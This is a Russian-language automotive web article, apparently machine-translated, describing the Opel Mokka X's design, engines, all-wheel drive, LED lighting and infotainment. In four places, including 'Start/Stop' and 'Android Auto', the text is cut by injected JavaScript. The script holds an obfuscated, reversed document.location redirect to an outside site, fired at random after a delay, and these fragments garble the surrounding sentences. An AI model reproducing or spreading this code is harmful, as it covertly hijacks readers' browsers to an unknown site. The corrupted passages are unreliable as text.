Добавить в закладки

Еще больше приключения — новый Opel Mokka X

С момента выхода на рынок в 2012 году Opel Mokka демонстрирует непрерывное развитие. Благодаря своим идеальным размерам (длина 4,28 метра), динамичному внешнему виду и высокому расположению сидений эта небольшая модель внедорожника соответствует духу времени и уже получила более 500 000 заказов в Европе, что делает ее одной из самых популярных моделей в своем сегменте. Теперь новый Opel Mokka X должен добавить к этой исключительной популярности. Мировая премьера модели состоится на предстоящем автосалоне в Женеве (с 3 по 13 марта 2016 г.) и выйдет на рынок этой осенью со свежим и культовым дизайном экстерьера, новым внутренним пространством и великолепными информационно-развлекательными системами последнего поколения. что делает его одной из самых привлекательных внедорожных моделей на рынке. Наряду с недавно дебютировавшими 1,6-литровыми «шепчущими» дизелями нового поколения, новый Mokka X расширит свою линейку бензиновых двигателей 1,4-литровым двигателем Direct Injection Turbo нового поколения, который будет сочетаться с автоматической коробкой передач, функцией Start / Stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top и двойной трансмиссией.

Уверенный и смелый внешний вид

Mokka можно охарактеризовать как один из символов успешного возвращения Opel (http://www.opelbook.ru/) в последние годы. Небольшой внедорожник привлек к бренду множество новых клиентов, покорив их своим характерным кузовом внедорожника в сочетании со стильным дизайном, динамичным, авантюрным шармом и настоящими внедорожными качествами. Новый Mokka X станет первым модельным рядом, в котором впервые появится опознавательный знак для будущих внедорожников и кроссоверов Opel — буква «X» подчеркивает более авантюрный и прочный характер, чем у более популярных моделей. Классические кузова.

Новый внешний вид Mokka X выглядит очень уверенно. Новая передняя компоновка соответствует новому стилистическому языку Opel, включая «крылатую» горизонтальную решетку радиатора и доминирующую четкую световую графику с двумя «крыльями» светодиодных дневных ходовых огней. Передний фартук также приобрел более четко и элегантно очерченные поверхности с меньшим количеством пластиковых вставок. Все это придает Mokka X более широкую, устойчивую и мужественную осанку. Эта линия продолжается сзади двумя знаковыми «крыльями», отражающимися в фарах и опционально предлагаемыми со светодиодной технологией. Боковой силуэт корпуса сохранил пластику и элегантность, а также динамичный акцент мускулистых и атлетичных линий в нижней части тела. получая дополнительную энергию от типичного для марки Opel «лезвия», линия которого динамично поднимается назад. Замечательные новые цвета, такие как «Янтарный апельсин» и «Абсолютный красный», вносят важный вклад в очарование Mokka X.

Атмосфера в интерьере Mokka X полностью изменилась. Здесь дебютирует совершенно новая приборная панель, вдохновленная новой Astra (http://www.opelbook.ru/astra). Новая панель управления организована вокруг большего количества элементов горизонтальной формы. Он выглядит и чище, и проще, а также четче и точнее в исполнении. Центральная консоль является полностью новой разработкой и совместима с 7- и 8-дюймовыми сенсорными экранами нового поколения информационно-развлекательных систем. Теперь дизайн впечатляет своей изысканной элегантностью и более чистым дизайном с меньшим количеством кнопок — многие функции теперь доступны через емкостные сенсорные экраны.

После внедрения нового поколения «шепчущих дизелей» 1.6 с максимальной мощностью 81 кВт / 110 л.с. и 100 кВт / 136 л.с., теперь линейка двигателей в модели внедорожника Opel будет расширена за счет бензиновых двигателей. 1,4-литровый двигатель Direct Injection Turbo нового поколения мощностью 112 кВт / 152 л.с., который недавно дебютировал в новой Astra, будет доступен в сочетании с шестиступенчатой автоматической коробкой передач, системой Start / Stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top и адаптивной двойной коробкой передач (средний уровень выбросов CO2. и расход топлива по предварительным данным — 154 г / км, 6,6 л / 100 км). Технология двойной трансмиссии с электромагнитным механизмом и многодисковой муфтой чрезвычайно интеллектуальна и эффективна. Когда дорожное покрытие высохло, Только колеса передней оси (за исключением запуска автомобиля с включенным режимом AWD) обеспечивают управление автомобилем, что помогает снизить расход топлива. В зависимости от дорожных условий распределение крутящего момента является плавным и плавным: от 100-процентного переднего привода на сухих поверхностях, что способствует низкому расходу топлива и максимальному распределению крутящего момента 50 процентов на переднюю и заднюю оси — например, при покрытии плотным слоем водный слой напольного покрытия.

В дополнение к системе двойной трансмиссии AWD инженеры Opel в очередной раз последовали стратегии Opel по обеспечению доступа к инновационным технологиям для широкой потребительской аудитории, представив систему Adaptive Forward Lighting со светодиодными элементами. Новая светодиодная система AFL автоматически адаптирует профили света фар к конкретной дорожной ситуации, чтобы обеспечить максимально хорошее освещение дороги без риска ослепить других участников дорожного движения. Система имеет девять различных функций или режимов освещения, таких как городской режим и режим бездорожья, туристический режим, функция динамического освещения поворотов и перекрестков, фонари заднего хода и маневрирования, а также режим Eco Stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top. Эта система со светодиодными элементами заменяет предыдущие AFL с биксеноновыми фарами. С одной стороны, светодиодные элементы гарантируют качество света, что позволяет видеть «настоящие» цвета вещей, повышая визуальный комфорт. Кроме того, отсутствие механического движения в модуле освещения увеличивает скорость и точность реакции, а также надежность при длительной эксплуатации.

Кроме того, новое поколение фронтальной видеокамеры Opel Eye с повышенным разрешением и увеличенной вычислительной мощностью при обработке изображений положительно сказывается на производительности всех поддерживаемых функций, включая автоматическое управление HBA (High Beam Assist) дальним светом AFL. система со светодиодными элементами. Благодаря улучшенной видеокамере и дополнительной поддержке навигации усовершенствованный помощник по дорожным знакам (TSA) Mokka может распознавать символы с еще большей точностью. Функция индикации следующего расстояния использует фронтальную видеокамеру для отслеживания движения впереди идущих автомобилей, а функция предупреждения о прямом столкновении (FCA) теперь дополняется предупреждающим светодиодным дисплеем, отражающимся на лобовом стекле. Когда расстояние между автомобилем и впереди идущим автомобилем начинает уменьшаться слишком быстро, отражение красных светодиодных элементов в стекле служит эффективным предупреждением для водителя. Кроме того, человека за рулем предупреждают о необходимости использования тормозов звуковым сигналом.

Как и новый Opel Astra, Mokka X будет доступен со всеми услугами Opel OnStar с момента его рыночной премьеры. Кроме того, в Mokka X дебютируют две версии информационно-развлекательной системы IntelliLink нового поколения. IntelliLink представит мир автомобильных смартфонов, предлагая возможность проецировать функции через Apple CarPlay и Android Autobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to.

Помимо лучших коммуникационных возможностей в классе небольших моделей внедорожников, новый Mokka X может легко претендовать на высочайший уровень комфорта в этом сегменте рынка. Как и большинство других моделей Opel, новое дополнение к линейке будет предлагать проверенные и сертифицированные AGR (Инициатива по улучшению здоровья спины, возглавляемая независимыми ортопедами) эргономичные сиденья, которые уникальны для этого сегмента рынка и сделают преодоление длинных участков шоссе столь же приятным. как выезд по пересеченной местности. Новый Mokka X получит еще один дополнительный инструмент для повышения комфорта — систему входа и запуска без ключа и запуска без ключа. С его помощью водитель не должен намеренно нажимать кнопку на пульте дистанционного управления ключом зажигания, чтобы разблокировать или заблокировать машину. Ему достаточно просто носить ключ в кармане или сумке — доступ в салон или багажное отделение обеспечивается только легким нажатием одной из маленьких кнопок, расположенных на дверных ручках. Запуск двигателя автомобиля также осуществляется без использования ключа зажигания.

Благодаря новому дизайну, расширенному ассортименту двигателей, проверенным внедорожным характеристикам, отличным коммуникационным возможностям и большим преимуществам комфорта, новый Mokka X имеет отличные предпосылки для продолжения серии побед своего предшественника, который, помимо многих других успехов, добился успеха. выиграл два титула «Автомобиль года с двойной коробкой передач» и две награды «Корпоративный автомобиль года» в Германии.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: admin
Опубликовано: 06.10.2021





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: